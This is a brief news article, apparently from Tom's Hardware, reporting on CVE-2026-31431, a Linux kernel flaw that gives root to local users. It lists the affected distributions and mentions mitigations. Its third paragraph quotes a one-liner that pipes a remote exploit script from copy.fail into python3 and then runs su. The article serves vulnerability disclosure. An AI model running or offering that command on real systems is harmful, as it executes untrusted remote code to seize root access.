It is quite an interesting patch week for Linux systems administrators out there. Researchers at Xint Code have discovered a nasty exploit that instantly grants root access to any local unprivileged user, a nightmare scenario for multi-user servers of various types, including web servers, container environments like Kubernetes, CI/CD pipelines, and more.

The CVE-2026-31431 exploit affects pretty much every Linux distro currently in use and has existed since 2017. Although it's not a zero-day and the kernel has already gotten a patch, the short disclosure window gave distro makers relatively little time to react. Affected variants include (but aren't limited to) Ubuntu 24 (version 26 was just released last week), RHEL 10, Suse 16, and Amazon Linux 2023. Even Windows' WSL2 is affected, and all it takes is 732 bytes to do it.

To check that a system is vulnerable, you can just run "curl https://copy.fail/exp | python3 && su" with a standard unprivileged account — though we should note that you're trusting an online script. The source code for the proof-of-concept is available here if you prefer. If your distro doesn't have a patch available yet, you can try one of two mitigation methods.

Follow Tom's Hardware on Google News, or add us as a preferred source, to get our latest news, analysis, & reviews in your feeds.